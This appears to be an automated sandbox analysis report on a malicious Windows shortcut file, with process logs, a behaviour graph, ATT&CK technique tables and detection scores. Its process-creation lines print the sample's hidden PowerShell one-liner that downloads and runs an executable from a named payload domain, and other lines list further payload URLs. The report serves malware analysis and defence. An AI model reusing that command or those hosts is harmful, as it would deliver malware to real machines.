Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3058Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3056Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5793Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3901Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4268Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4027Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5884Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3823Jump to behavior
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 5085Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ctfmoon.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep time: -19369081277395017s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep time: -15679732462653109s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7056Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4576Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4648Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: svchost.exe, 0000000A.00000002.2570806923.00000203ED42B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
Source: powershell.exe, 00000003.00000002.1547715754.00000207E4BA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: powershell.exe, 00000006.00000002.1647699924.000001D7FCAB5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2573554079.00000203F2A54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.1547715754.00000207E4BA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\-O
Source: powershell.exe, 00000012.00000002.2736600743.000001DAFC764000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )=Vmci
Source: powershell.exe, 00000012.00000002.2734761731.000001DAFC6F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000003.00000002.1547715754.00000207E4B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV0T
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -Uri https://badlarrysguitars.com/share/drp.exe -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\nthelper.exe "C:\Users\user\AppData\Local\Temp\nthelper.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"Jump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "start-process powershell -argumentlist 'invoke-webrequest -uri "https://badlarrysguitars.com/share/drp.exe" -outfile (join-path ([system.io.path]::gettemppath()) "nthelper.exe"); start-process -filepath (join-path ([system.io.path]::gettemppath()) "nthelper.exe")' -windowstyle hidden"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" invoke-webrequest -uri https://badlarrysguitars.com/share/drp.exe -outfile (join-path ([system.io.path]::gettemppath()) nthelper.exe); start-process -filepath (join-path ([system.io.path]::gettemppath()) nthelper.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" invoke-webrequest -uri https://badlarrysguitars.com/share/drp.exe -outfile (join-path ([system.io.path]::gettemppath()) nthelper.exe); start-process -filepath (join-path ([system.io.path]::gettemppath()) nthelper.exe) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter
1
DLL Side-Loading
11
Process Injection
11
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
31
Virtualization/Sandbox Evasion
LSASS Memory11
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570131 Sample: IFhqcKaIol.lnk Startdate: 06/12/2024 Architecture: WINDOWS Score: 80 49 badlarrysguitars.com 2->49 51 x1.i.lencr.org 2->51 53 bg.microsoft.map.fastly.net 2->53 61 Windows shortcut file (LNK) starts blacklisted processes 2->61 63 Multi AV Scanner detection for submitted file 2->63 65 Suspicious powershell command line found 2->65 67 3 other signatures 2->67 12 powershell.exe 15 2->12         started        15 svchost.exe 1 1 2->15         started        signatures3 process4 dnsIp5 75 Windows shortcut file (LNK) starts blacklisted processes 12->75 77 Suspicious powershell command line found 12->77 79 Powershell drops PE file 12->79 18 powershell.exe 14 17 12->18         started        22 conhost.exe 1 12->22         started        59 127.0.0.1 unknown unknown 15->59 signatures6 process7 dnsIp8 55 badlarrysguitars.com 101.99.75.174, 443, 49706, 49717 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 18->55 45 C:\Users\user\AppData\Local\...\nthelper.exe, PE32+ 18->45 dropped 24 nthelper.exe 18->24         started        27 conhost.exe 18->27         started        file9 process10 signatures11 69 Windows shortcut file (LNK) starts blacklisted processes 24->69 71 Suspicious powershell command line found 24->71 73 Machine Learning detection for dropped file 24->73 29 powershell.exe 17 24->29         started        32 powershell.exe 3 20 24->32         started        process12 file13 47 C:\Users\user\AppData\Local\...\ctfmoon.exe, PE32+ 29->47 dropped 34 conhost.exe 29->34         started        36 Acrobat.exe 75 32->36         started        38 conhost.exe 32->38         started        process14 process15 40 AcroCEF.exe 108 36->40         started        process16 42 AcroCEF.exe 6 40->42         started        dnsIp17 57 3.219.243.226, 443, 49761, 49767 AMAZON-AESUS United States 42->57

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
IFhqcKaIol.lnk21%ReversingLabsScript-BAT.Downloader.Heuristic
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\nthelper.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\nthelper.exe8%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://badlarrysguitars.com/private/nois.exe-OutFile(Join-Path(0%Avira URL Cloudsafe
https://badlarrysguitars.com/share/alert.pdf0%Avira URL Cloudsafe
http://www.microsoft.co0%Avira URL Cloudsafe
https://badlarrysguitars.com/share/alert.pdf-OutFile(Join-Path(0%Avira URL Cloudsafe
https://badlarrysguitars.com/share/drp.exe-OutFile(Join-Path(0%Avira URL Cloudsafe
http://badlarrysguitars.com0%Avira URL Cloudsafe
https://badlarrysguitars.com/private/nois.exe0%Avira URL Cloudsafe
https://badlarrysguitars.com0%Avira URL Cloudsafe
https://badlarrysguitars.com/share/drp.exeel0%Avira URL Cloudsafe
https://badlarrysguitars.com/share/drp.exe0%Avira URL Cloudsafe
https://oneget.org0%Avira URL Cloudsafe
https://oneget.orgX0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    badlarrysguitars.com
    101.99.75.174
    truetrue
      unknown
      x1.i.lencr.org
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://badlarrysguitars.com/share/alert.pdftrue
        • Avira URL Cloud: safe
        unknown
        https://badlarrysguitars.com/private/nois.exetrue
        • Avira URL Cloud: safe
        unknown
